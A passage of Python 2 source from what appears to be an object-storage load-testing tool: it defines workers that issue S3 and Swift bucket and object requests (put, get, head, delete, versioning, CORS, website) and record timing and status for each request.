i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def bucket_delete(process_id, user, conn, result_queue):
request_type = 'BucketDelete'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['deletebucket'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
rest.sendContent = '<?xml version="1.0" encoding="UTF-8"?><DeleteBucket><Bucket>' + rest.bucket + '</Bucket></DeleteBucket>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def options_bucket(process_id, user, conn, result_queue):
request_type = 'OPTIONSBucket'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['Access-Control-Request-Method'] = 'GET'
rest.headers['Origin'] = CONFIG['DomainName']
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def put_bucket_versioning(process_id, user, conn, result_queue):
request_type = 'PutBucketVersioning'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk, auth_algorithm=CONFIG['AuthAlgorithm'],
virtual_host=CONFIG['VirtualHost'], domain_name=CONFIG['DomainName'],
region=CONFIG['Region'])
rest.queryArgs['versioning'] = None
rest.sendContent = '<VersioningConfiguration><Status>%s</Status></VersioningConfiguration>' % CONFIG[
'VersionStatus']
rest.headers['Content-MD5'] = base64.b64encode(hashlib.md5(rest.sendContent).digest())
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
logging.info('bucket:' + rest.bucket)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def get_bucket_versioning(process_id, user, conn, result_queue):
request_type = 'GetBucketVersioning'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['versioning'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def put_bucket_website(process_id, user, conn, result_queue):
request_type = 'PutBucketWebsite'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['website'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
rest.sendContent = '<WebsiteConfiguration><RedirectAllRequestsTo><HostName>' + CONFIG[
'RedirectHostName'] + '</HostName></RedirectAllRequestsTo></WebsiteConfiguration>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def get_bucket_website(process_id, user, conn, result_queue):
request_type = 'GetBucketWebsite'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['website'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_bucket_website(process_id, user, conn, result_queue):
request_type = 'DeleteBucketWebsite'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['website'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
rest.sendContent = '<WebsiteConfiguration><RedirectAllRequestsTo><HostName>' + CONFIG[
'RedirectHostName'] + '</HostName></RedirectAllRequestsTo></WebsiteConfiguration>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def put_bucket_cors(process_id, user, conn, result_queue):
request_type = 'PutBucketCORS'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['cors'] = None
rest.sendContent = '<CORSConfiguration><CORSRule><AllowedMethod>GET</AllowedMethod><AllowedOrigin>%s</AllowedOrigin></CORSRule></CORSConfiguration>' % \
CONFIG['DomainName']
rest.headers['Content-MD5'] = base64.b64encode(hashlib.md5(rest.sendContent).digest())
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def get_bucket_cors(process_id, user, conn, result_queue):
request_type = 'GetBucketCORS'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['cors'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_bucket_cors(process_id, user, conn, result_queue):
request_type = 'DeleteBucketCORS'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['cors'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
rest.sendContent = '<WebsiteConfiguration><RedirectAllRequestsTo><HostName>' + CONFIG[
'RedirectHostName'] + '</HostName></RedirectAllRequestsTo></WebsiteConfiguration>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def put_object(process_id, user, conn, result_queue):
request_type = 'PutObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['content-type'] = 'application/octet-stream'
if CONFIG['PutWithACL']:
rest.headers['x-amz-acl'] = CONFIG['PutWithACL']
fixed_size = False
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aws:kms':
rest.headers['x-amz-server-side-encryption'] = 'aws:kms'
if CONFIG['SrvSideEncryptAWSKMSKeyId']:
rest.headers['x-amz-server-side-encryption-aws-kms-key-id'] = CONFIG['SrvSideEncryptAWSKMSKeyId']
if CONFIG['SrvSideEncryptContext']:
rest.headers['x-amz-server-side-encryption-context'] = CONFIG['SrvSideEncryptContext']
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aes256':
rest.headers['x-amz-server-side-encryption'] = 'AES256'
# 如果打开CalHashMD5开关,在对象上传时写入一个自定义元数据,用于标记为本工具put上传的对象。
if CONFIG['CalHashMD5']:
rest.headers['x-amz-meta-md5written'] = 'yes'
# 对象多版本,需要在上传后记录下版本号
obj_v = ''
obj_v_file = 'data/objv-%d.dat' % process_id
open(obj_v_file, 'w').write(obj_v)
# 错开每个并发起始选桶,避免单桶性能瓶颈。
range_arr = range(0, CONFIG['BucketsPerUser'])
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
if CONFIG['ObjectLexical']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index', str(
j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
else:
rest.key = Util.random_string_create(random.randint(300, 1024))
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
logging.debug('side-encryption-customer-key: [%r]' % rest.key[-32:].zfill(32))
j += 1
put_times_for_one_obj = CONFIG['PutTimesForOneObj']
while put_times_for_one_obj > 0:
if not fixed_size:
# change size every request for the same obj.
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['ObjectSize'])
put_times_for_one_obj -= 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
if resp.return_data:
obj_v += '%s\t%s\t%s\n' % (rest.bucket, rest.key, resp.return_data)
# 每1KB,写入对象的versionID到本地文件objv-process_id.dat
if len(obj_v) >= 1024:
logging.info('write obj_v to file %s' % obj_v_file)
open(obj_v_file, 'a').write(obj_v)
obj_v = ''
if obj_v:
open(obj_v_file, 'a').write(obj_v)
def swiftput_object(process_id, user, conn, result_queue):
request_type = 'swiftPutObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['content-type'] = 'application/octet-stream'
rest.headers['X-auth-token'] = user.sk
fixed_size = False
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
# 如果打开CalHashMD5开关,在对象上传时写入一个自定义元数据,用于标记为本工具put上传的对象。
if CONFIG['CalHashMD5']:
rest.headers['x-amz-meta-md5written'] = 'yes'
# 对象多版本,需要在上传后记录下版本号
obj_v = ''
obj_v_file = 'data/objv-%d.dat' % process_id
open(obj_v_file, 'w').write(obj_v)
# 错开每个并发起始选桶,避免单桶性能瓶颈。
range_arr = range(0, CONFIG['BucketsPerUser'])
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
# rest.bucket = '%s.%d' % (CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
if CONFIG['ObjectLexical']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index', str(
j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
else:
rest.key = Util.random_string_create(random.randint(300, 1024))
j += 1
put_times_for_one_obj = CONFIG['PutTimesForOneObj']
while put_times_for_one_obj > 0:
if not fixed_size:
# change size every request for the same obj.
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['ObjectSize'])
put_times_for_one_obj -= 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
if resp.return_data:
obj_v += '%s\t%s\t%s\n' % (rest.bucket, rest.key, resp.return_data)
# 每1KB,写入对象的versionID到本地文件objv-process_id.dat
if len(obj_v) >= 1024:
logging.info('write obj_v to file %s' % obj_v_file)
open(obj_v_file, 'a').write(obj_v)
obj_v = ''
if obj_v:
open(obj_v_file, 'a').write(obj_v)
def handle_from_objects(request_type, rest, process_id, user, conn, result_queue):
"""
:type result_queue: Queue
"""
global OBJECTS
objects_per_user = len(OBJECTS) / CONFIG['Threads']
if objects_per_user == 0:
if process_id >= len(OBJECTS):
return
else:
start_index = end_index = process_id
else:
extra_obj = len(OBJECTS) % CONFIG['Threads']
if process_id == 0:
start_index = 0
end_index = objects_per_user + extra_obj
else:
start_index = process_id * objects_per_user + extra_obj
end_index = start_index + objects_per_user
while start_index < end_index:
rest.bucket = OBJECTS[start_index][:OBJECTS[start_index].find('/')]
rest.key = OBJECTS[start_index][OBJECTS[start_index].find('/') + 1:]
if CONFIG['Testcase'] in (202,) and CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
start_index += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
if CONFIG["Testcase"] in (202,):
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
else:
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue):
obj_v_file_read = open(obj_v_file, 'r')
obj = obj_v_file_read.readline()
while obj:
if obj and len(obj.split('\t')) != 3:
logging.info('obj [%r] format error in file %s' % (obj, obj_v_file))
continue
obj = obj[:-1]
rest.bucket = obj.split('\t')[0]
rest.key = obj.split('\t')[1]
if rest.requestType == 'GetObject':
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
rest.queryArgs['versionId'] = obj.split('\t')[2]
obj = obj_v_file_read.readline()
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
def get_object(process_id, user, conn, result_queue):
request_type = 'GetObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
if CONFIG['Testcase'] in (202, 900) and CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
# 如果传入OBJECTS,则直接处理OBJECTS。
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# 如果data下有上传记录的对象名和版本,从该文件读。
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
# 从字典序对象名下载。
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
def swiftget_object(process_id, user, conn, result_queue):
request_type = 'swiftGetObject'
rest = s3PyCmd.S3RequestDescriptor(request_type =request_type, ak = user.ak, sk = user.sk)
rest.headers['X-auth-token'] = user.sk
if CONFIG['Testcase'] in (202, 900) and CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# 如果data下有上传记录的对象名和版本,从该文件读。
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
# 从字典序对象名下载。
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
def swifthead_object(process_id, user, conn, result_queue):
request_type = 'swiftHeadObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['X-auth-token'] = user.sk
# 如果传入OBJECTS,则直接处理OBJECTS。
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def head_object(process_id, user, conn, result_queue):
request_type = 'HeadObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
# 如果传入OBJECTS,则直接处理OBJECTS。
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_object(process_id, user, conn, result_queue):
request_type = 'DeleteObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
# 如果传入OBJECTS,则直接处理OBJECTS。
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# 如果data下有上传记录的对象名和版本,从该文件读。
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
range_arr = range(0, CONFIG['BucketsPerUser'])
# 错开每个并发起始选桶,避免单桶性能瓶颈。
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftdelete_object(process_id, user, conn, result_queue):
request_type = 'swiftDeleteObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['X-auth-token'] = user.sk
# 如果传入OBJECTS,则直接处理OBJECTS。
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# 如果data下有上传记录的对象名和版本,从该文件读。
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
